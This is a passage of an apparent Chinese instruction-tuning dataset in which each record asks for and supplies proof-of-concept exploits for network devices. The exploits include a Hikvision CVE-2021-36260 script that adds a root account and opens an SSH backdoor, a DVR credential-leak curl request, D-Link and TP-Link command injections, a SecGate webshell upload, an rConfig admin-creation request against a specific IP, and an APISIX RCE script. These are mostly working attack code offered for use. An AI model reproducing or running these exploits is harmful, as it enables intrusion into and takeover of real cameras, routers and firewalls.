'http://127.0.0.1:8080',\n        })\n        \"\"\"\n\n    def send(self, url=None, query_args=None, timeout=5):\n\n        if query_args:\n            \"\"\"Some devices can handle more, others less, 22 bytes seems like a good compromise\"\"\"\n            if len(query_args) > 22:\n                print(f'[!] Error: Command \"{query_args}\" to long ({len(query_args)})')\n                return None\n\n        \"\"\"This weird code will try automatically switch between http/https\n        and update Host\n        \"\"\"\n        try:\n            if url and not query_args:\n                return self.get(url, timeout)\n            else:\n                data = self.put('/SDK/webLanguage', query_args, timeout)\n        except requests.exceptions.ConnectionError:\n            self.proto = 'https' if self.proto == 'http' else 'https'\n            self._init_uri()\n            try:\n                if url and not query_args:\n                    return self.get(url, timeout)\n                else:\n                    data = self.put('/SDK/webLanguage', query_args, timeout)\n            except requests.exceptions.ConnectionError:\n                return None\n        except requests.exceptions.RequestException:\n            return None\n        except KeyboardInterrupt:\n            return None\n\n        \"\"\"302 when requesting http on https enabled device\"\"\"\n\n        if data.status_code == 302:\n            redirect = data.headers.get('Location')\n            self.uri = redirect[:redirect.rfind('/')]\n            self._update_host()\n            if url and not query_args:\n                return self.get(url, timeout)\n            else:\n                data = self.put('/SDK/webLanguage', query_args, timeout)\n\n        return data\n\n    def _update_host(self):\n        if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:\n            self.remote.headers.update({\n                'Host': self.uri[self.uri.rfind('://') + 3:],\n            })\n\n    def _init_uri(self):\n        self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))\n\n    def put(self, url, query_args, timeout):\n        \"\"\"Command injection in the <language> tag\"\"\"\n        query_args = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>' \\\n                     f'<language>$({query_args})</language>'\n        return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)\n\n    def get(self, url, timeout):\n        return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)\n\n\ndef check(remote, args):\n    \"\"\"\n    status_code == 200 (OK);\n        Verified vulnerable and exploitable\n    status_code == 500 (Internal Server Error);\n        Device may be vulnerable, but most likely not\n        The SDK webLanguage tag is there, but generate status_code 500 when language not found\n        I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)\n        (Issue: Could also be other directory than 'webLib', r/o FS etc...)\n    status_code == 401 (Unauthorized);\n        Defiantly not vulnerable\n    \"\"\"\n    if args.noverify:\n        print(f'[*] Not verifying remote \"{args.rhost}:{args.rport}\"')\n        return True\n\n    print(f'[*] Checking remote \"{args.rhost}:{args.rport}\"')\n\n    data = remote.send(url='/', query_args=None)\n    if data is None:\n        print(f'[-] Cannot establish connection to \"{args.rhost}:{args.rport}\"')\n        return None\n    print('[i] ETag:', data.headers.get('ETag'))\n\n    data = remote.send(query_args='>webLib/c')\n    if data is None or data.status_code == 404:\n        print(f'[-] \"{args.rhost}:{args.rport}\" do not looks like Hikvision')\n        return False\n    status_code = data.status_code\n\n    data = remote.send(url='/c', query_args=None)\n    if not data.status_code == 200:\n        \"\"\"We could not verify command injection\"\"\"\n        if status_code == 500:\n            print(f'[-] Could not verify if vulnerable (Code: {status_code})')\n            if args.reboot:\n                return check_reboot(remote, args)\n        else:\n            print(f'[+] Remote is not vulnerable (Code: {status_code})')\n        return False\n\n    print('[!] Remote is verified exploitable')\n    return True\n\n\ndef check_reboot(remote, args):\n    \"\"\"\n    We sending 'reboot', wait 2 sec, then checking with GET request.\n    - if there is data returned, we can assume remote is not vulnerable.\n    - If there is no connection or data returned, we can assume remote is vulnerable.\n    \"\"\"\n    if args.check:\n        print('[i] Checking if vulnerable with \"reboot\"')\n    else:\n        print(f'[*] Checking remote \"{args.rhost}:{args.rport}\" with \"reboot\"')\n    remote.send(query_args='reboot')\n    time.sleep(2)\n    if not remote.send(url='/', query_args=None):\n        print('[!] Remote is vulnerable')\n        return True\n    else:\n        print('[+] Remote is not vulnerable')\n        return False\n\n\ndef cmd(remote, args):\n    if not check(remote, args):\n        return False\n    data = remote.send(query_args=f'{args.cmd}>webLib/x')\n    if data is None:\n        return False\n\n    data = remote.send(url='/x', query_args=None)\n    if data is None or not data.status_code == 200:\n        print(f'[!] Error execute cmd \"{args.cmd}\"')\n        return False\n    print(data.text)\n    return True\n\n\ndef cmd_blind(remote, args):\n    \"\"\"\n    Blind command injection\n    \"\"\"\n    if not check(remote, args):\n        return False\n    data = remote.send(query_args=f'{args.cmd_blind}')\n    if data is None or not data.status_code == 500:\n        print(f'[-] Error execute cmd \"{args.cmd_blind}\"')\n        return False\n    print(f'[i] Try execute blind cmd \"{args.cmd_blind}\"')\n    return True\n\n\ndef shell(remote, args):\n    if not check(remote, args):\n        return False\n    data = remote.send(url='/N', query_args=None)\n\n    if data.status_code == 404:\n        print(f'[i] Remote \"{args.rhost}\" not pwned, pwning now!')\n        data = remote.send(query_args='echo -n P::0:0:W>N')\n        if data.status_code == 401:\n            print(data.headers)\n            print(data.text)\n            return False\n        remote.send(query_args='echo :/:/bin/sh>>N')\n        remote.send(query_args='cat N>>/etc/passwd')\n        remote.send(query_args='dropbear -R -B -p 1337')\n        remote.send(query_args='cat N>webLib/N')\n    else:\n        print(f'[i] Remote \"{args.rhost}\" already pwned')\n\n    print(f'[*] Trying SSH to {args.rhost} on port 1337')\n    os.system(f'stty echo; stty iexten; stty icanon; \\\n    ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \\\n    P@{args.rhost} -p 1337')\n\n\ndef main():\n    print('[*] Hikvision CVE-2021-36260\\n[*] PoC by bashis <mcw noemail eu> (2021)')\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')\n    parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')\n    parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')\n    parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')\n    parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')\n    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: \"ls -l\")')\n    parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: \"reboot\")')\n    parser.add_argument(\n        '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'\n    )\n    parser.add_argument(\n        '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'\n    )\n    args = parser.parse_args()\n\n    remote = Http(args.rhost, args.rport, args.proto)\n\n    try:\n        if args.shell:\n            shell(remote, args)\n        elif args.cmd:\n            cmd(remote, args)\n        elif args.cmd_blind:\n            cmd_blind(remote, args)\n        elif args.check:\n            check(remote, args)\n        elif args.reboot:\n            check_reboot(remote, args)\n        else:\n            parser.parse_args(['-h'])\n    except KeyboardInterrupt:\n        return False\n\n\nif __name__ == '__main__':\n    main()\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION DSIDSIPC 等设备 远程命令执行漏洞 CVE-2021-36260.md"}
    337. 

  337. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION 视频编码设备接入网关 $DATA 任意文件读取\n漏洞描述:HIKVISION 视频编码设备接入网关存在配置错误特性,特殊后缀请求php文件可读取源码\n影响版本:``` HIKVISION 视频编码设备接入网关 ```\n网络测绘:``` title=\"视频编码设备接入网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. HIKVISION 视频编码设备接入网关\n2. title=\"视频编码设备接入网关\"\n3. /data/login.php::$DATA\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION 视频编码设备接入网关 $DATA 任意文件读取.md"}
    338. 

  338. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:DVR 登录绕过漏洞 CVE-2018-9995\n漏洞描述:DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机。最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。\n影响版本:``` Novo CeNova QSee Pulnix XVR 5 in 1 (title: \"XVR Login\") Securus, - Security. Never Compromise !! - Night OWL DVR Login HVR Login MDVR Login ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2018-9995\n【POC利用方法】\n1. Novo\nCeNova\nQSee\nPulnix\nXVR 5 in 1 (title: \"XVR Login\")\nSecurus, - Security. Never Compromise !! -\nNight OWL\nDVR Login\nHVR Login\nMDVR Login\n2. curl \"http://xxx.xxx.xxx.xxx/device.rsp?opt=user&cmd=list\" -H \"Cookie: uid=admin\"\n3. curl \"http://xxx.xxx.xxx.xxx/device.rsp?opt=user&cmd=list\" -H \"Cookie: uid=admin\"\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/DVR 登录绕过漏洞 CVE-2018-9995.md"}
    339. 

  339. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞\n漏洞描述:D-Link ShareCenter DNS-320 system_mgr.cgi 存在远程命令执行,攻击者通过漏洞可以控制服务器\n影响版本:``` D-Link ShareCenter DNS-320 ```\n网络测绘:``` app=\"D_Link-DNS-ShareCenter\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. D-Link ShareCenter DNS-320\n2. app=\"D_Link-DNS-ShareCenter\"\n3. /cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;ls;\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link ShareCenter DNS-320 system_mgr.cgi 远程命令执行漏洞.md"}
    340. 

  340. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TP-Link TL-WR841N 远程代码执行漏洞 CVE-2020-35576\n漏洞描述:通过该漏洞,经过身份验证的攻击者可以在TP-Link TL-WR841N系统上执行任意命令。 参考链接: - https://isopach.dev/CVE-2020-35576/ - https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-35576\n影响版本:``` TP-Link TL-WR841N ```\n网络测绘:``` app=\"TP_LINK-TL-WR841N\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-35576\n【POC利用方法】\n1. TP-Link TL-WR841N\n2. app=\"TP_LINK-TL-WR841N\"\n3. # Author: Koh You Liang (Isopach)\n# Exploit Title: TP-Link TL-WR841N OS Command Injection Exploit\n# Date: 2020-12-13\n# Vendor Homepage: https://www.tp-link.com/\n# Software Link: https://www.tp-link.com/jp/support/download/tl-wr841n/v13/#Firmware\n# Version: TL-WR841N 0.9.1 4.0\n# Tested on: Windows 10, macOS Mojave, Ubuntu 20.04.1 LTS\n# CVE: CVE-2020-35576\n\nimport requests\nimport sys\nimport time\n\ntry:\n    _ = sys.argv[2]\n    payload = ' '.join(sys.argv[1:])\nexcept IndexError:\n    try:\n        payload = sys.argv[1]\n    except IndexError:\n        print(\"[*] Command not specified, using the default `cat etc/passwd`\")\n        payload = 'cat etc/passwd'\n\n# Default credentials is admin:admin - replace with your own\ncookies = {\n    'Authorization': 'Basic YWRtaW46YWRtaW4='\n}\n\nheaders = {\n    'Host': '192.168.0.1',\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',\n    'Accept': '*/*',\n    'Accept-Language': 'en-US,en;q=0.5',\n    'Accept-Encoding': 'gzip, deflate',\n    'Content-Type': 'text/plain',\n    'Content-Length': '197',\n    'Origin': 'http://192.168.0.1',\n    'Connection': 'close',\n    'Referer': 'http://192.168.0.1/mainFrame.htm',\n}\n\ndata1 = \\\n'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\\r\\nmaxHopCount=20\\r\\ntimeout=50\\r\\nnumberOfTries=1\\r\\nhost=\"`{}`\"\\r\\ndataBlockSize=64\\r\\nX_TP_ConnName=ewan_ipoe_d\\r\\ndiagnosticsState=Requested\\r\\nX_TP_HopSeq=0\\r\\n'''.format(payload)\nresponse1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)\nprint('[+] Sending payload...')\n\ntry:\n    response1.text.splitlines()[0]\nexcept IndexError:\n    sys.exit('[-] Cannot get response. Please check your cookie.')\n    \nif response1.text.splitlines()[0] != '[error]0':\n    sys.exit('[*] Router/Firmware is not vulnerable.')\n\ndata2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\\r\\n'\nresponse2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)\nprint('[+] Receiving response from router...')\ntime.sleep(0.8) # Buffer time for traceroute to succeed\n\ndata3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\\r\\ndiagnosticsState\\r\\nX_TP_HopSeq\\r\\nX_TP_Result\\r\\n'''\nresponse3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)\n\n\nif '=:' in response3.text.splitlines()[3]:\n    print('[-] Command not supported.')\nelse:\n    print('[+] Exploit successful!')\n    for line_number, line in enumerate(response3.text.splitlines()):        \n        try:\n            if line_number == 3:\n                print(line[12:])\n            if line_number > 3 and line != '[error]0':\n                print(line)\n                if 'not known' in line:\n                    break\n        except IndexError:\n            break\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/TP-Link TL-WR841N 远程代码执行漏洞 CVE-2020-35576.md"}
    341. 

  341. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞\n漏洞描述:网神 SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限\n影响版本:网神 SecGate 3600 防火墙\n网络测绘:``` fid=\"1Lh1LHi6yfkhiO83I59AYg==\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. fid=\"1Lh1LHi6yfkhiO83I59AYg==\"\n2. POST /?g=obj_app_upfile HTTP/1.1\nHost: \nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Length: 574\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc\nUser-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)\n\n------WebKitFormBoundaryJpMyThWnAxbcBBQc\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n10000000\n------WebKitFormBoundaryJpMyThWnAxbcBBQc\nContent-Disposition: form-data; name=\"upfile\"; filename=\"vulntest.php\"\nContent-Type: text/plain\n\n<?php system(\"id\");unlink(__FILE__);?>\n\n------WebKitFormBoundaryJpMyThWnAxbcBBQc\nContent-Disposition: form-data; name=\"submit_post\"\n\nobj_app_upfile\n------WebKitFormBoundaryJpMyThWnAxbcBBQc\nContent-Disposition: form-data; name=\"__hash__\"\n\n0b9d6b1ab7479ab69d9f71b05e0e9445\n------WebKitFormBoundaryJpMyThWnAxbcBBQc--\n3. Accept: */*\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞.md"}
    342. 

  342. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link DSL-28881A 远程命令执行 CVE-2020-24581\n漏洞描述:D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在安全漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。 在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。\n影响版本:``` D-Link DSL-2888A ```\n网络测绘:``` body=\"DSL-2888A\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-24581\n【POC利用方法】\n1. D-Link DSL-2888A\n2. body=\"DSL-2888A\"\n3. #!/bin/sh\n. /usr/syscfg/api_log.sh\n\ncmd=`echo ${QUERY_STRING} | cut -d = -f 3`\ncmd=`echo ${cmd} | tr \"%20\" \" \"`\n\nresult=`${cmd}`\nTGP_Log ${TGP_LOG_WARNING} \"cmd=${cmd}, result=${result}\"\n\necho \"Content-type: text/html\"\necho \"\"\necho -n ${result}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DSL-28881A 远程命令执行 CVE-2020-24581.md"}
    343. 

  343. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:rConfig userprocess.php 任意用户创建漏洞\n漏洞描述:rConfig userprocess.php 存在任意用户创建漏洞,发送特定的请求包攻击者可以创建管理员账户登录后台\n影响版本:``` rConfig ```\n网络测绘:``` app=\"rConfig\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"rConfig\"\n2. <?php\n\n/**\n * Process.php\n * \n * The Process class is meant to simplify the task of processing\n * user submitted forms, redirecting the user to the correct\n * pages if errors are found, or if form is successful, either\n * way. Also handles the logout procedure.\n *\n * Written by: Jpmaster77 a.k.a. The Grandmaster of C++ (GMC)\n * Last Updated: August 19, 2004\n */\ninclude(\"/home/rconfig/classes/usersession.class.php\");\n\nclass Process {\n    /* Class constructor */\n\n    function Process() {\n        global $session;\n        /* User submitted login form */\n        if (isset($_POST['sublogin'])) {\n            $this->procLogin();\n        }\n        /* Admin submitted user add form */ else if (isset($_POST['add']) && isset($_POST['editid']) && empty($_POST['editid'])) {\n            $this->procRegister();\n        }\n        /* Admin submitted user edit form */ else if (isset($_POST['add']) && isset($_POST['editid']) && !empty($_POST['editid'])) {\n            $this->procUpdateAccount();\n        }\n        /* User submitted forgot password form */ else if (isset($_POST['subforgot'])) {\n            $this->procForgotPass();\n        }\n        /* User submitted edit account form */ else if (isset($_POST['subedit'])) {\n            $this->procEditAccount();\n        }\n        /**\n         * The only other reason user should be directed here\n         * is if he wants to logout, which means user is\n         * logged in currently.\n         */ else if ($session->logged_in) {\n            $this->procLogout();\n        }\n        /**\n         * Should not get here, which means user is viewing this page\n         * by mistake and therefore is redirected.\n         */ else {\n            header(\"Location: /login.php\");\n        }\n    }\n\n    /**\n     * procLogin - Processes the user submitted login form, if errors\n     * are found, the user is redirected to correct the information,\n     * if not, the user is effectively logged in to the system.\n     */\n    function procLogin() {\n        global $session, $form;\n        /* Login attempt */\n        $retval = $session->login($_POST['user'], $_POST['pass'], isset($_POST['remember']));\n        /* Login successful */\n        if ($retval) {\n            header(\"Location: \" . $session->referrer);\n        }\n        /* Login failed */ else {\n            $_SESSION['value_array'] = $_POST;\n            $_SESSION['error_array'] = $form->getErrorArray();\n            header(\"Location: \" . $session->referrer);\n        }\n    }\n\n    /**\n     * procLogout - Simply attempts to log the user out of the system\n     * given that there is no logout form to process.\n     */\n    function procLogout() {\n        global $session;\n        $retval = $session->logout();\n        header(\"Location: /login.php\");\n    }\n\n    /**\n     * procRegister - Processes the user submitted registration form,\n     * if errors are found, the user is redirected to correct the\n     * information, if not, the user is effectively registered with\n     * the system and an email is (optionally) sent to the newly\n     * created user.\n     */\n    function procRegister() {\n        global $session, $form;\n        /* Convert username to all lowercase (by option) */\n        if (ALL_LOWERCASE) {\n            $_POST['username'] = strtolower($_POST['username']);\n        }\n        /* Registration attempt */\n        $retval = $session->register($_POST['username'], $_POST['password'], $_POST['passconf'], $_POST['email'], $_POST['ulevelid']);\n\n        /* Registration Successful */\n        if ($retval == 0) {\n            $_SESSION['reguname'] = $_POST['username'];\n            $_SESSION['regsuccess'] = true;\n            $errors['Success'] = \"User \" . $_POST['username'] . \" successfully added to Database\";\n            $_SESSION['errors'] = $errors;\n            header(\"Location: \" . $session->referrer);\n        }\n        /* Error found with form */ else if ($retval == 1) {\n            $_SESSION['value_array'] = $_POST;\n            $_SESSION['errors'] = $form->getErrorArray();\n            header(\"Location: \" . $session->referrer . \"?error\");\n        }\n        /* Registration attempt failed */ else if ($retval == 2) {\n            $_SESSION['reguname'] = $_POST['username'];\n            $_SESSION['regsuccess'] = false;\n            $errors['Fail'] = \"ERROR: User \" . $_POST['username'] . \" could not be added to Database\";\n            $_SESSION['errors'] = $errors;\n            header(\"Location: \" . $session->referrer);\n        }\n    }\n\n    /**\n     * procForgotPass - Validates the given username then if\n     * everything is fine, a new password is generated and\n     * emailed to the address the user gave on sign up.\n     */\n    function procForgotPass() {\n        global $database, $session, $mailer, $form;\n        /* Username error checking */\n        $subuser = $_POST['user'];\n        $field = \"user\";  //Use field name for username\n        if (!$subuser || strlen($subuser = trim($subuser)) == 0) {\n            $form->setError($field, \"Username not entered<br>\");\n            $_SESSION['value_array'] = $_POST;\n            $_SESSION['errors'] = $form->getErrorArray();\n            header(\"Location: \" . $session->referrer . \"?error\");\n        } else {\n            /* Make sure username is in database */\n            $subuser = stripslashes($subuser);\n            if (strlen($subuser) < 5 || strlen($subuser) > 30 ||\n                    !preg_match(\"/^([0-9a-z])+$/\", $subuser) ||\n                    (!$database->usernameTaken($subuser))) {\n                $form->setError($field, \"Unknown Username\");\n                $_SESSION['value_array'] = $_POST;\n                $_SESSION['errors'] = $form->getErrorArray();\n                header(\"Location: \" . $session->referrer . \"?error\");\n            }\n        }\n        /* Errors exist, have user correct them */\n        if ($form->num_errors > 0) {\n            $_SESSION['value_array'] = $_POST;\n            $_SESSION['error_array'] = $form->getErrorArray();\n        } else {\n            /* Generate new password */\n            $newpass = $session->generateRandStr(8);\n            /* Get email of user */\n            $usrinf = $database->getUserInfo($subuser);\n            $email = $usrinf['email'];\n            /* Attempt to send the email with new password */\n            if ($mailer->sendNewPass($subuser, $email, $newpass)) {\n                /* Email sent, update database */\n                $database->updateUserField($subuser, \"password\", md5($newpass));\n                echo \"<script>\"\n                . \"alert('Your new password has been generated. The password was emailed to $email');\"\n                . \"window.close();\"\n                . \"</script>\";\n            }/* Email failure, do not change password */ \n            else {\n                $_SESSION['forgotpass'] = false;\n            }\n        }\n    }\n\n    /**\n     * procEditAccount - Attempts to edit the user's account\n     * information, including the password, which must be verified\n     * before a change is made.\n     */\n    function procEditAccount() {\n        global $session, $form;\n        /* Account edit attempt */\n        $retval = $session->editAccount($_POST['editid'], $_POST['username'], $_POST['curpass'], $_POST['newpass'], $_POST['passconf'], $_POST['email'], $_POST['ulevelid']);\n\n        /* Account edit successful */\n        if ($retval == 0) {\n            $_SESSION['useredit'] = $_POST['username'];\n            $_SESSION['useredit'] = true;\n            $errors['Success'] = \"User \" . $_POST['username'] . \" successfully edited\";\n            $_SESSION['errors'] = $errors;\n            header(\"Location: \" . $session->referrer);\n        }\n        /* Error found with form */ else if ($retval == 1) {\n            $_SESSION['value_array'] = $_POST;\n            $_SESSION['errors'] = $form->getErrorArray();\n            header(\"Location: \" . $session->referrer . \"?error\");\n        }\n        /* Registration attempt failed */ else if ($retval == 2) {\n            $_SESSION['useredit'] = $_POST['username'];\n            $_SESSION['regsuccess'] = false;\n            $errors['Fail'] = \"ERROR: User \" . $_POST['username'] . \" could not be edited\";\n            $_SESSION['errors'] = $errors;\n            header(\"Location: \" . $session->referrer);\n        }\n    }\n\n    /**\n     * procEditAccount - Attempts to edit the user's account\n     * information, including the password, which must be verified\n     * before a change is made.\n     */\n    function procUpdateAccount() {\n        // http or https check for url Protocol\n        $protocol = 'http';\n        if (isset($_SERVER['HTTPS'])) {\n            if (strtoupper($_SERVER['HTTPS']) == 'ON') {\n                $protocol = 'https';\n            }\n        }\n\n        global $session, $form;\n        /* Account edit attempt */\n        $retval = $session->updateAccount($_POST['editid'], $_POST['username'], $_POST['password'], $_POST['passconf'], $_POST['email'], $_POST['ulevelid']);\n\n        /* Account edit successful */\n        if ($retval == 0) {\n            $_SESSION['useredit'] = $_POST['username'];\n            $_SESSION['useredit'] = true;\n            $errors['Success'] = \"User \" . $_POST['username'] . \" successfully edited\";\n            $_SESSION['errors'] = $errors;\n            header(\"Location: \" . $protocol . \"://\" . $_SERVER['HTTP_HOST'] . \"/\" . \"useradmin.php\");\n        }\n        /* Error found with form */ else if ($retval == 1) {\n            $_SESSION['value_array'] = $_POST;\n            $_SESSION['errors'] = $form->getErrorArray();\n            header(\"Location: \" . $protocol . \"://\" . $_SERVER['HTTP_HOST'] . \"/\" . \"useradmin.php?error\");\n        }\n        /* Registration attempt failed */ else if ($retval == 2) {\n            $_SESSION['useredit'] = $_POST['username'];\n            $_SESSION['regsuccess'] = false;\n            $errors['Fail'] = \"ERROR: User \" . $_POST['username'] . \" could not be edited\";\n            $_SESSION['errors'] = $errors;\n            header(\"Location: \" . $protocol . \"://\" . $_SERVER['HTTP_HOST'] . \"/\" . \"useradmin.php\");\n        }\n    }\n\n}\n\n/* Initialize process */\n$process = new Process;\n3. POST /lib/crud/userprocess.php HTTP/1.1\nHost: 194.149.41.11\nUser-Agent: python-requests/2.25.1\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: multipart/form-data; boundary=b1467349fcce4aa0ae8d44439f4e06bc\nUpgrade-Insecure-Requests: 1\nReferer: http://194.149.41.11/useradmin.php\nOrigin: http://194.149.41.11/\nCookie: PHPSESSID=test\nContent-Length: 697\n\n--b1467349fcce4aa0ae8d44439f4e06bc\nContent-Disposition: form-data; name=\"username\"\n\ntesttest\n--b1467349fcce4aa0ae8d44439f4e06bc\nContent-Disposition: form-data; name=\"password\"\n\ntesttest@123\n--b1467349fcce4aa0ae8d44439f4e06bc\nContent-Disposition: form-data; name=\"passconf\"\n\ntesttest@123\n--b1467349fcce4aa0ae8d44439f4e06bc\nContent-Disposition: form-data; name=\"email\"\n\ntesttest@test.com\n--b1467349fcce4aa0ae8d44439f4e06bc\nContent-Disposition: form-data; name=\"ulevelid\"\n\n9\n--b1467349fcce4aa0ae8d44439f4e06bc\nContent-Disposition: form-data; name=\"add\"\n\nadd\n--b1467349fcce4aa0ae8d44439f4e06bc\nContent-Disposition: form-data; name=\"editid\"\n\n\n--b1467349fcce4aa0ae8d44439f4e06bc--\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/rConfig userprocess.php 任意用户创建漏洞.md"}
    344. 

  344. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache APISIX Dashboard API权限绕过导致RCE CVE-2021-45232\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-45232\n【POC利用方法】\n1. docker-compose up -d\n2. #!/usr/bin/env python3\nimport zlib\nimport json\nimport random\nimport requests\nimport string\nimport sys\nfrom urllib3.exceptions import InsecureRequestWarning\n\n# Suppress only the single warning from urllib3 needed.\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\n\neval_config = {\n    \"Counsumers\": [],\n    \"Routes\": [\n        {\n            \"id\": str(random.randint(100000000000000000, 1000000000000000000)),\n            \"create_time\": 1640674554,\n            \"update_time\": 1640677637,\n            \"uris\": [\n                \"/rce\"\n            ],\n            \"name\": \"rce\",\n            \"methods\": [\n                \"GET\",\n                \"POST\",\n                \"PUT\",\n                \"DELETE\",\n                \"PATCH\",\n                \"HEAD\",\n                \"OPTIONS\",\n                \"CONNECT\",\n                \"TRACE\"\n            ],\n            \"script\": \"local file = io.popen(ngx.req.get_headers()['cmd'],'r') \\n local output = file:read('*all') \\n file:close() \\n ngx.say(output)\",\n            \"status\": 1\n        }\n    ],\n    \"Services\": [],\n    \"SSLs\": [],\n    \"Upstreams\": [],\n    \"Scripts\": [],\n    \"GlobalPlugins\": [],\n    \"PluginConfigs\": []\n}\n\n\ndef random_str():\n    return ''.join(random.choices(string.ascii_letters + string.digits, k=6))\n\n\ndef calc_crc(data):\n    crc32 = zlib.crc32(data) & 0xffffffff\n    return crc32.to_bytes(4, byteorder=\"big\")\n\n\ndef export_data(url):\n    r = requests.get(url + \"/apisix/admin/migrate/export\", verify=False)\n    return r.text[:-4]\n\n\ndef import_data(url, data):\n    data = json.dumps(data).encode()\n    crc32 = calc_crc(data)\n\n    files = {\"file\": (\"data\", data + crc32, \"text/data\")}\n    resp = requests.post(url + \"/apisix/admin/migrate/import\", files=files, verify=False)\n    # print(resp.text)\n    if resp.json().get(\"code\", -1) == 0:\n        return True\n    else:\n        return False\n\n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 2:\n        print(\"python \" + sys.argv[0] + \" http://127.0.0.1:9000\")\n        exit()\n    \n    url = sys.argv[1]\n    if url.endswith(\"/\"):\n        url = url[:-1]\n\n    uri = random_str()\n    eval_config[\"Routes\"][0][\"uris\"] = [ \"/\" + uri]\n    eval_config[\"Routes\"][0][\"name\"] = uri\n\n    if import_data(url, eval_config):\n        print(\"attack success\")\n        print(\"uri is: \" + \"/\" + uri)\n    else:\n        print(\"attack error\")\n3. GET /LQsRF0 HTTP/1.1\nHost: your-ip:9080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36\nConnection: close\nCMD: id\nCache-Control: max-age=0\n", "category": "poc_network_device_vulnerability", "source": 